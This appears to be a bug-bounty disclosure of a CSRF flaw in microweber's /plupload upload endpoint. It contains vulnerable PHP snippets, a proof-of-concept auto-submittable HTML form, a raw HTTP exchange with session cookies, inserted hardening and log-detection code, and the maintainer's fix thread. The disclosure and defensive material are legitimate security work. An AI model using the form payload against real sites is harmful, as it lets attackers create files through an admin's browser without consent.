CSRF attack while uploading files on [/plupload] via GET request in microweber/microweber

Valid

Reported on

Jun 26th 2022


Description

The application protects itself from CSRF attacks by sending the CSRF token in a cookie and checking its value on the backend, and by also checking the Referer header: the CSRF token is deleted from the cookies if the request comes from another origin and is only added to the request if the request came from the domain itself. This is a good technique, but I found that the file upload endpoint /plupload does not use the same protection, and the CSRF token is sent with the request from another origin, so we can attack the application via a CSRF attack.

The upload function creates files and folders, and because it uses $_REQUEST instead of $_POST we can send both GET and POST requests, so we can create files on the server with a simple GET request. You can check that on line 54:

$fileName_ext = isset($_REQUEST['name']) ? $_REQUEST['name'] : ''; // $_REQUEST merges GET and POST parameters, so "name" is accepted from either

The file src\MicroweberPackages\App\functions\plupload.php includes the following if conditions. The first one (lines 14 to 19) is for the Referer header, which must be present in the request:

$validate_token = false;
if (!isset($_SERVER['HTTP_REFERER'])) {
    // a request without a Referer header is rejected...
    header("HTTP/1.1 401 Unauthorized");

    die('{"jsonrpc" : "2.0", "error" : {"code":97, "message": "You are not allowed to upload"}}');
} elseif (!stristr($_SERVER['HTTP_REFERER'], site_url())) {
    // ...but a Referer from another domain is accepted, because the remote-domain check below is commented out
    //    if (!is_logged()){
//        die('{"jsonrpc" : "2.0", "error" : {"code":98, "message": "You cannot upload from remote domains"}}');
//    }
}

The following condition, on line 26, checks the CSRF token:

$validate_token = mw()->user_manager->csrf_validate($_GET); // the token is read from the query string ($_GET), not from a POST body
if ($validate_token == false) {
    header("HTTP/1.1 401 Unauthorized");
    die('{"jsonrpc" : "2.0", "error" : {"code":98, "message": "You are not allowed to upload"}}');
}
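The following is an added example of how the gating logic in the two snippets above (and the cookie-plus-Referer scheme described at the start of the report) can be hardened; it is not microweber's code and is not the fix the maintainer merged. site_url() and the mw()->user_manager->csrf_validate(array) call are the names the report quotes; reject(), origin_key() and same_origin_request() are helper names assumed here for the example.

```php
<?php
// Added example, not microweber's code: a hardened form of the request gating
// shown in the report's snippets. site_url() and csrf_validate(array) are the
// names the report quotes; reject(), origin_key() and same_origin_request()
// are assumed helper names.

declare(strict_types=1);

// Send the JSON-RPC style error the endpoint already uses, then stop.
function reject(int $status, string $reason, int $code, string $message): void
{
    header("HTTP/1.1 $status $reason");
    header('Content-Type: application/json');
    echo json_encode(['jsonrpc' => '2.0', 'error' => ['code' => $code, 'message' => $message]]);
    exit;
}

// Normalise a URL to "scheme://host:port" so two origins can be compared exactly.
// An exact comparison replaces the stristr() substring test, which would also
// accept a Referer such as http://192.168.61.130.attacker.example/ .
function origin_key(?string $url): ?string
{
    if ($url === null || $url === '') {
        return null;
    }
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return null;               // also covers the literal "null" Origin value
    }
    $scheme = strtolower($p['scheme']);
    $port   = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    return $scheme . '://' . strtolower($p['host']) . ':' . $port;
}

// True only when the request carries an Origin (preferred) or Referer header
// whose origin equals the site's own. A missing header is treated as cross-site.
function same_origin_request(string $siteUrl, ?string $origin, ?string $referer): bool
{
    $site = origin_key($siteUrl);
    $src  = origin_key($origin ?? $referer);
    return $site !== null && $src !== null && $site === $src;
}

// 1. Creating files is a state change: require POST so a plain GET link or an
//    auto-submitting GET form can never reach the upload code.
if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
    header('Allow: POST');
    reject(405, 'Method Not Allowed', 96, 'Uploads must be sent with POST');
}

// 2. Enforce the origin check for every user, admins included; the disabled
//    is_logged() branch in the original is what let a logged-in admin's browser be abused.
if (!same_origin_request(site_url(), $_SERVER['HTTP_ORIGIN'] ?? null, $_SERVER['HTTP_REFERER'] ?? null)) {
    reject(401, 'Unauthorized', 98, 'You cannot upload from remote domains');
}

// 3. Validate the CSRF token from the POST body rather than $_GET, so the
//    token cannot be carried along in a query string.
if (!mw()->user_manager->csrf_validate($_POST)) {
    reject(401, 'Unauthorized', 98, 'You are not allowed to upload');
}

// 4. Read the upload parameters from $_POST only. $_REQUEST merges GET (and,
//    depending on request_order, cookie) values back in and reopens the GET path.
$fileName_ext = isset($_POST['name'])   ? (string) $_POST['name']  : '';
$chunk        = isset($_POST['chunk'])  ? (int) $_POST['chunk']    : 0;
$chunks       = isset($_POST['chunks']) ? (int) $_POST['chunks']   : 0;
// ... the rest of the upload handling (chunk assembly, extension allow-list) follows as before.
```

The site origin is taken from configuration (site_url()), never from the client-controlled Host header, and the origin comparison is exact rather than a substring match. The CSRF token itself should still be compared against a value that a cross-site page cannot read (a server-side session value or a double-submit value that the same-origin check protects), which is what csrf_validate() is assumed to do here.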

Proof of Concept

The following is my exploit payload which

<form action="http://192.168.61.130/test/microweber-master/plupload"> 
<input type="hidden" name="name" value="text.txt">
<input type="hidden" name="chunk" value="">
<input type="hidden" name="chunks" value="">
<input type="hidden" name="file" value="CSRF attack">
<input type="submit">
</form>

The following is the request as sent to a running application:

GET /test/microweber-master/plupload?name=text.txt&chunk=&chunks=&file=CSRF+attack HTTP/1.1
Host: 192.168.61.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://57.217.163.25/
Cookie: laravel_session=vmFa4i7A4ZKzlyQgVAhiHlqYlQP457I693WBybqQ; csrf-token-data=%7B%22value%22%3A%22fC1AncN9XvSUl6JF6NHV14Xh7I9dSppPA8fhXPQn%22%2C%22expiry%22%3A1656231713515%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7Ci6aPtAJPWZFxlC4xmqcX4bfnYyFIev9N1AaFHg38cjw0MjDjvLwvZ203MzbZ%7C%242y%2410%24EOb00CAViFXjvcwXYxT8UumlJbI3dq7.VVOapX%2Fq3wYu%2FjCahPBe2; back_to_admin=http%3A//192.168.61.130/test/microweber-master/admin/
Upgrade-Insecure-Requests: 1


And the following is the response:

HTTP/1.1 200 OK
Date: Sun, 26 Jun 2022 08:31:07 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 26 Jun 2022 08:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 117
Connection: close
Content-Type: application/json

{"src":"http:\/\/192.168.61.130\/test\/microweber-master\/userfiles\/media\/default\/text_3.txt","name":"text_3.txt"}
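As an added example, not part of the report or of microweber, the request/response pair above can be turned into a simple detection over web server access logs: a GET to the plupload endpoint that returned 200 while the Referer was missing or came from another host. The log lines below are constructed in Apache/Nginx combined format to mirror the report's request (Referer http://57.217.163.25/ against the site 192.168.61.130); parse_combined() and is_cross_site_get_upload() are names chosen for this example.

```php
<?php
// Added example, not from the report or from microweber: flag access-log
// entries showing the pattern the report demonstrates. The log lines and the
// site host are constructed for this example.

declare(strict_types=1);

const SITE_HOST       = '192.168.61.130';
const UPLOAD_ENDPOINT = '/plupload';

// Constructed sample lines in "combined" log format.
const SAMPLE_LOG = [
    '192.168.61.1 - - [26/Jun/2022:08:31:07 +0000] "GET /test/microweber-master/plupload?name=text.txt&chunk=&chunks=&file=CSRF+attack HTTP/1.1" 200 117 "http://57.217.163.25/" "Mozilla/5.0"',
    '192.168.61.1 - - [26/Jun/2022:08:32:10 +0000] "POST /test/microweber-master/plupload HTTP/1.1" 200 117 "http://192.168.61.130/test/microweber-master/admin/" "Mozilla/5.0"',
    '192.168.61.1 - - [26/Jun/2022:08:33:00 +0000] "GET /test/microweber-master/plupload?name=x.txt HTTP/1.1" 401 80 "-" "Mozilla/5.0"',
    '192.168.61.1 - - [26/Jun/2022:08:34:00 +0000] "GET /test/microweber-master/plupload?name=y.txt HTTP/1.1" 200 117 "-" "Mozilla/5.0"',
];

// Parse one combined-format line into its fields, or return null if it does not match.
function parse_combined(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'client'  => $m[1],
        'time'    => $m[2],
        'method'  => $m[3],
        'target'  => $m[4],
        'status'  => (int) $m[5],
        'referer' => $m[7] === '-' ? null : $m[7],   // "-" means the header was absent
    ];
}

// The pattern from the report: GET (not POST) to the upload endpoint, HTTP 200,
// and either no Referer or a Referer whose host is not the site itself.
function is_cross_site_get_upload(array $e, string $siteHost): bool
{
    if ($e['method'] !== 'GET' || $e['status'] !== 200) {
        return false;
    }
    $path = parse_url($e['target'], PHP_URL_PATH) ?: '';
    if (substr($path, -strlen(UPLOAD_ENDPOINT)) !== UPLOAD_ENDPOINT) {
        return false;
    }
    $refHost = $e['referer'] === null ? null : parse_url($e['referer'], PHP_URL_HOST);
    return $refHost === null || strtolower($refHost) !== strtolower($siteHost);
}

foreach (SAMPLE_LOG as $line) {
    $e = parse_combined($line);
    if ($e !== null && is_cross_site_get_upload($e, SITE_HOST)) {
        printf("ALERT %s %s %s %s referer=%s\n",
            $e['time'], $e['client'], $e['method'], $e['target'], $e['referer'] ?? '-');
    }
}
```

Run against the constructed lines, only the two successful GET requests (the one with the foreign Referer and the one with no Referer) are reported; the same-origin POST and the rejected 401 request are not. In production the host comparison should use the configured site host, and the check is only useful on versions that still accept GET uploads, since after the fix such requests should no longer return 200.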

Impact

This allows unauthorized users to invoke functions that belong to the admin, and it can be used to fill the server's storage and memory by brute-forcing the upload function.

Occurrences

This line is proof that the application accepts both GET and POST requests.

We are processing your report and will contact the microweber team within 24 hours. a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov modified the Severity from Medium to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a month ago
Mohamed Sayed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on e49d79 a month ago
Peter Ivanov has been awarded the fix bounty
plupload.php#L54 has been validated
Peter Ivanov
a month ago

Maintainer


Hello, thanks for the report.

This issue required the user to be logged in as admin in order to send the request.

Now it's fixed and CSRF verification also applies to the admin user.

Mohamed Sayed
a month ago

Researcher


Is there a CVE that will be assigned to this report?

Peter Ivanov
a month ago

Maintainer


You can assign CVE if you wish
